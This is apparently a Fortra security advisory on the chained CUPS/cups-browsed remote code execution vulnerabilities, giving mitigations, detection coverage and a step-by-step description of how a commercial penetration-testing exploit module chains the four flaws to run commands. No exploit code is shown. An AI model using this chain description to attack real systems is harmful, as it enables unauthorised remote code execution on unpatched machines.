Updated:
Status:
CVEs:
Fortra is actively researching several vulnerabilities in UNIX systems. These vulnerabilities can allow a remote unauthenticated attacker to achieve remote code execution via a UDP packet to port 631 if the CUPS port is open. LAN attacks are also possible via spoofing zeroconf / mDNS / DNS-SD advertisements. Customers are recommended to update the CUPS package to mitigate this vulnerability.
Who is affected?
UNIX systems with CUPS installed and enabled are affected. The affected CUPS packages, including cups-browsed, are available for most systems, but may or may not be enabled by default. Check your distribution’s security advisories to determine if you are affected.
- Redhat advisory
- Debian advisories
- Ubuntu advisories
- Amazon Linux advisories
- Suse advisories
What can I do?
The following mitigation steps are recommended:
- Disable and remove the cups-browsed service if not needed.
- Update the CUPS package.
- If the system cannot be updated, block all traffic to UDP port 631 and possibly all DNS-SD traffic.
How is Fortra helping me?
Fortra is actively researching this threat to build detection capabilities in addition to those listed below.
Alert Logic Network IDS: Alert Logic released IDS telemetry signatures to aid in detection research.
Alert Logic Vulnerability Scanning: Alert Logic released agent-based scan detection for Ubuntu and RHEL on September 30, 2024. Additionally, Alert Logic released authenticated scan coverage for Alma, Ubuntu, and RHEL on October 1, and for Amazon Linux 2023 on October 8.
Core Impact: The exploit “Linux OpenPrinting cups-browsed Remote Code Execution Exploit” for CUPS multiple chained vulnerabilities CVE-2024-47076, CVE-2024-47175, CVE-2024-47177 was delivered to Core Impact customers. This module chains four vulnerabilities to deploy an agent in a Linux target system that will run with the cups-browsed daemon user privileges.
- The first vulnerability is cups-browsed which binds on UDP INADDR_ANY:631 trusting any packet from any source to trigger a Get-Printer-Attributes IPP request to an attacker controlled URL.
- Then it abuses a vulnerability in libcupsfilters where function cfGetPrinterAttributes5 does not validate or sanitize the IPP attributes returned from an IPP server, providing attacker-controlled data to the rest of the CUPS system.
- After that it uses a third vulnerability in libppd, where function ppdCreatePPDFromIPP2 does not validate or sanitize the IPP attributes when writing them to a temporary PPD file, allowing the injection of attacker-controlled data in the resulting PPD.
- The last vulnerability is in cups-filters where foomatic-rip allows arbitrary command execution via the FoomaticRIPCommandLine PPD parameter. This module will start a fake IPP Server that will be used to deliver the payload to exploit the last three vulnerabilities, creating a fake printer on the system. It will then send a packet to the target to exploit the first vulnerability.
- Finally, the attack chain will be triggered by sending an HTTP request to the CUPS Management Interface to print a test page on the fake printer, which will execute the commands that will deploy the agent. The URL for the CUPS Management Interface can be set with the CUPS_MANAGEMENT_URL parameter. If no value is specified, then http and tcp port 631 will be used.
- If the final step fails (i.e. if the CUPS Management Interface only listens in the local interface) the module will keep running for a period of time waiting for the target system to create a print job on the fake printer that will deliver the attack to deploy the agent. The wait time (in seconds) can be changed with the ATTACK_TIMEOUT parameter. The default/minimal value is 90 seconds.
Fortra VM: Fortra VM released new authenticated checks for CVE-2024-47176, CVE-2024-47076, and CVE-2024-47175 on October 3, 2024, via Network Scanner 4.51.1, ELSA-2024-7346: cups-filters security update (160879) and RHSA-2024:7346: cups-filters security update (160793).
Tripwire IP360: Tripwire released authenticated scan coverage on October 2, 2024, to identify vulnerable instances. If the vulnerabilities are found, Tripwire vulnerabilities 666795, 666788, 666780, 666747, 665804, 665800, or 665615 will match for CVE-2024-47176, 666794, 666787, 666782, 666779, 666746, 665807, 665803, or 665614 will match for CVE-2024-47076, 666796, 666786, 666781, 666777, 666744, 665820, 665819, or 665613 will match for CVE-2024-47175, and 666778 or 666745 will match for CVE-2024-47177.
Updates
Fortra has kicked off the Emerging Threats process for this vulnerability. This article will be updated with new information about this vulnerability and related security coverage as it becomes available.
09/30/2024: Alert Logic released agent-based scan detection for Ubuntu and RHEL.
10/01/2024: Alert Logic released authenticated scan coverage for Alma, Ubuntu, and RHEL.
10/02/2024: Tripwire IP360 released authenticated scan coverage.
10/03/2024: Fortra VM released new authenticated checks for CVE-2024-47176, CVE-2024-47076, and CVE-2024-47175.
10/08/2024: Alert Logic released authenticated scan coverage for Amazon Linux 2023.
10/11/2024: Core Impact released a new exploit for these CVEs.